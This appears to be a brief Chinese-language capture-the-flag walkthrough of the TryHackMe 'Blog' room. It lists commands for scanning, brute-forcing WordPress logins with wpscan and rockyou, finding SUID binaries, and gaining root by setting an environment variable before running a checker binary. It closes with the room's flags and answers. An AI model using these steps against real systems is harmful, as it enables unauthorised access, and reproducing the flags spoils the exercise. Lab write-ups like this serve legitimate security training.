tryhackme–Blog
nmap扫描
nmap -T4 -sS -sV 10.10.223.252 -sC
CMS和版本都知道了,本地查找漏洞
msf有利用脚本
wpscan --url http://10.10.150.219/ -U user.txt -P tools/dict/rockyou.txt
find / -name *user.txt > 2.txt
cat 2.txt
find / -type f -perm -u=s 2>/dev/null
执行命令他说我们不是admin,并且为一个位elf文件,用ltrace查看他引用了哪些函数,看到getenv()函数,就可以知道他与环境变量有关,添加一个环境变量:admin=1,再执行命令权限已经为root,好家伙又学到了一招。
export admin=1
/usr/sbin/checker
接下来我们找user.txt的位置和值,找和bjoel用户有关的文件
find / -user bjoel > 2.txt
cat 2.txt
所以问题的答案:
root.txt
9a0b2b618bef9bfa7ac28c1353d9f318
user.txt
c84219aae571f7af42b71a8ab7
Where was user.txt found?
/media/usb
What CMS was Billy using?
Wordpress
What version of the above CMS was being used?
5.0
ps:
个人站点博客:,欢迎来踩~